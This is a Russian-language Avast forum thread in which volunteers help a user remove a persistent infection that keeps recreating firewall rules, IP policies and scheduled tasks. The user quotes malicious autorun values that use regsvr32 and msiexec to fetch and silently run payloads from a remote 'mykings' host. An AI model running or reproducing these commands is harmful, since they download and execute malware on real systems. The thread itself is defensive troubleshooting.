Avast WEBforum
Non-English Zone => Русский => Topic started by: REDACTED on August 21, 2017, 06:57:39 PM
-
Здравствуйте, столкнулся с такой проблемой, компьютер перестали видеть другие устройства (как в локальной сети, так и в интернете). Очень долго мучился, но всё же добился устранения проблемы. Оказывается была создана локальная политика ip безопасности с какими-то списками ip фильтров, был включен брандмаузер, и в нем были созданы правила на блокировку и разблокировку портов, я это всё исправил, всё повыключал и поудалял. Но вдруг через пару часов все эти вещи вернулись назад: политика создалась, брандмаузер включился, правила брандмаузера создались (причём я выключал брандмаузер через слукжбы). Начал копать глубже, в планировщике задач нашёл странные задачи по типу "Mysa (1) (2) (3)", естессно их удалил, но они потом опять появились. На форумах вычитал, что это вирус, там советовали просканировать утилитой CureIt, она что-то нашла, что-то вылечила, но вскоре всё опять вернулось... Читал, что для каждого пользователя этот вирус удаляется индивидуально, нужно какие-то логи высылать и т. д.. Так вот, я готов выслать всё, что потребуется, только помогите удалить этот вирус навсегда...
-
Ссылка на архив с логами: https://yadi.sk/d/avdMZBbV3MCqfp
-
Женя15, здравствуйте и добро пожаловать на форум!
1. - Сохраните прикрепленный файл fixlist.txt на Рабочем столе
- Теперь, пожалуйста, запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
- Обратите внимание, что компьютер будет перезагружен.
ВНИМАНИЕ! Данный скрипт написан только для этого пользователя, использование его на другом компьютере может привести к неработоспособности ОС!
2. Скачайте, пожалуйста, WMI Explorer 2.0 по ссылке https://www.bleepingcomputer.com/download/wmi-explorer/
В нем, в ROOT\subscription найдите класс ActiveScriptEventConsumer, далее скопируйте скрипт, сохраните в блокноте и прикрепите в следующем сообщении. После этого данный класс можно удалить.
-
Спасибо за отклик, вот, отослал...
А по второму пункту, у меня в WMI Explorer 2.0 всё пусто...
Или я может что-то не так делаю? Можете объяснить поподробнее?
-
1. Запустите WMI Explorer и в левом верхнем углу нажмите кнопку Connect
2. В появившемся дереве найдите ROOT\subscription и дважды кликните по нему
3. в Classes появится ActiveScriptEventConsumer, кликните дважды по нему и в следующей панельке выберите вкладку Script и отметьте VBScript. Скопируйте содержимое в Блокнот и прикрепите к следующему сообщению.
-
Вот...
On Error Resume Next
Const wbemFlagReturnImmediately = &h10
Const wbemFlagForwardOnly = &h20
Set wshNetwork = WScript.CreateObject("WScript.Network")
strComputer = wshNetwork.ComputerName
strQuery = "SELECT * FROM ActiveScriptEventConsumer"
WScript.StdOut.WriteLine ""
WScript.StdOut.WriteLine "====================================="
WScript.StdOut.WriteLine "COMPUTER : " & strComputer
WScript.StdOut.WriteLine "CLASS : ROOT\subscription:ActiveScriptEventConsumer"
WScript.StdOut.WriteLine "QUERY : " & strQuery
WScript.StdOut.WriteLine "====================================="
WScript.StdOut.WriteLine ""
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\ROOT\subscription")
Set colItems = objWMIService.ExecQuery(strQuery, "WQL", wbemFlagReturnImmediately + wbemFlagForwardOnly)
For Each objItem in colItems
strCreatorSID = Join(objItem.CreatorSID, ",")
WScript.StdOut.WriteLine "CreatorSID: " & strCreatorSID
WScript.StdOut.WriteLine "KillTimeout: " & objItem.KillTimeout
WScript.StdOut.WriteLine "MachineName: " & objItem.MachineName
WScript.StdOut.WriteLine "MaximumQueueSize: " & objItem.MaximumQueueSize
WScript.StdOut.WriteLine "Name: " & objItem.Name
WScript.StdOut.WriteLine "ScriptFilename: " & objItem.ScriptFilename
WScript.StdOut.WriteLine "ScriptingEngine: " & objItem.ScriptingEngine
WScript.StdOut.WriteLine "ScriptText: " & objItem.ScriptText
WScript.StdOut.WriteLine ""
Next
-
Вот буквально пару минут назад, включился брандмаузер и всё остальное...
-
Вот лог: https://yadi.sk/i/Mqcsqeg93MD9UK
-
1. Запустите WMI Explorer и в левом верхнем углу нажмите кнопку Connect
2. В появившемся дереве найдите ROOT\subscription и дважды кликните по нему
3. в Classes появится ActiveScriptEventConsumer, кликните дважды по нему и в следующей панельке выберите вкладку Script и отметьте VBScript. Скопируйте содержимое в Блокнот и прикрепите к следующему сообщению.
Выше...
-
Женя15, в WMI Explorer во вкладке Instances имеются записи? Если да, то дважды кликните по нему и скопируйте содержимое поля StringText в следующее сообщение.
-
Женя15, в WMI Explorer во вкладке Instances имеются записи? Если да, то дважды кликните по нему и скопируйте содержимое поля StringText в следующее сообщение.
Открываю, WMI, нажимаю присоединиться, и там вкладка Instances пуста, или нужно по какому-то пути пройти сначала?
-
1. Запустите WMI Explorer и в левом верхнем углу нажмите кнопку Connect
2. В появившемся дереве найдите ROOT\subscription и дважды кликните по нему
3. в Classes появится ActiveScriptEventConsumer, кликните дважды по нему и в следующей панельке выберите вкладку Instances, если имеются экземпляры, то дважды кликните по ниму и скопируйте содержимое поля StringText в следующее сообщение
-
1. Запустите WMI Explorer и в левом верхнем углу нажмите кнопку Connect
2. В появившемся дереве найдите ROOT\subscription и дважды кликните по нему
3. в Classes появится ActiveScriptEventConsumer, кликните дважды по нему и в следующей панельке выберите вкладку Instances, если имеются экземпляры, то дважды кликните по ниму и скопируйте содержимое поля StringText в следующее сообщение
Там пусто
Иногда появляются в автозагрузке две задачи:
Имя - Start. Тип - REG_SZ. Значение - regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll.
Имя - Start1. Тип - REG_SZ. Значение - msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q.
По этим процессам я так понял и загружается вирьё снова...
Но или я просто успеваю удалять эти строки из автозапуска или ещё что-то...
Как это заблокировать? Чтобы эти строки не появлялись?
-
Иногда появляются в автозагрузке две задачи:
Имя - Start. Тип - REG_SZ. Значение - regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll.
Имя - Start1. Тип - REG_SZ. Значение - msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q.
По этим процессам я так понял и загружается вирьё снова...
Но или я просто успеваю удалять эти строки из автозапуска или ещё что-то...
Как это заблокировать? Чтобы эти строки не появлялись?
Скачайте по этой ссылке программу и запустите с правами администратора,всё что найдёт программа удалите и проверьте опять.
http://www.comss.ru/page.php?id=1309
А эти ссылки по работе с этой программой
http://virtmachine.ru/chto-za-programma-adwcleaner.html
http://safezone.cc/threads/kratkaja-instrukcija-po-rabote-s-utilitoj-adwcleaner.22250/
-
Иногда появляются в автозагрузке две задачи:
Имя - Start. Тип - REG_SZ. Значение - regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll.
Имя - Start1. Тип - REG_SZ. Значение - msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q.
По этим процессам я так понял и загружается вирьё снова...
Но или я просто успеваю удалять эти строки из автозапуска или ещё что-то...
Как это заблокировать? Чтобы эти строки не появлялись?
Скачайте по этой ссылке программу и запустите с правами администратора,всё что найдёт программа удалите и проверьте опять.
http://www.comss.ru/page.php?id=1309
А эти ссылки по работе с этой программой
http://virtmachine.ru/chto-za-programma-adwcleaner.html
http://safezone.cc/threads/kratkaja-instrukcija-po-rabote-s-utilitoj-adwcleaner.22250/
Всё чисто, вот только как избавиться от появления учётной записи ASP.USER???
-
1. Запустите WMI Explorer и в левом верхнем углу нажмите кнопку Connect
2. В появившемся дереве найдите ROOT\subscription и дважды кликните по нему
3. в Classes появится ActiveScriptEventConsumer, кликните дважды по нему и в следующей панельке выберите вкладку Instances, если имеются экземпляры, то дважды кликните по ниму и скопируйте содержимое поля StringText в следующее сообщение
Строки автозапуска больше вроде как не появляются, но как избавиться от появления учётной записи ASP.USER???
-
Данная учетная запись создает при установке .NET Framework, удалять ее не нужно.
-
Данная учетная запись создает при установке .NET Framework, удалять ее не нужно.
Так NET Framework у меня давно уже установлен, а запись начала появляться недавно, когда вирьё обнаружилось...